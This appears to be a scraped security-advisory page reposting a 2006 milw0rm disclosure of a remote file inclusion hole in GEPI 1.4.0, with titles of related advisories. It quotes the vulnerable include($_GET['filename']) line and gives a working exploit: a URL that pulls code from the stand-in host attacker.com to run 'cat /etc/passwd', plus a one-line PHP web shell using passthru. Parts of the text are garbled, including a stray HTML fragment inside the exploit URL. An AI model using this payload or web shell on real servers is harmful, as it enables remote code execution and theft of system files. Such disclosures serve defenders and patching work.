Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) [ECHO_ADV_56$2006] P-Book <= 1.17 (pb_lang) Remote File Inclusion HITWEB Remote File Include Clanlite Remote File Include jamroom Remote File Include From:MILW0RM <submit_(at)_milw0rm.com> Date:31.10.2006Subject:GEPI <= 1.4.0 gestion/savebackup.php Remote File Include VulnerabilityPackage:- gepi 1.4.0 http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz impact:- highly critical ..System Access.. vulnerable code:- include($_GET['filename']); in gepi/gestion/savebackup.php Exploit:- http://localhost/gepi/gestion/savebackup.php?filename=lass="fixed">http://attacker.com/test.txt&cmd=cat /etc/passwd in test.txt <? passthru("$_GET[cmd]");?> Credits:- $um$id # milw0rm.com [2006-10-31]
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
[ECHO_ADV_56$2006] P-Book <= 1.17 (pb_lang) Remote File Inclusion
HITWEB Remote File Include
Clanlite Remote File Include
jamroom Remote File Include
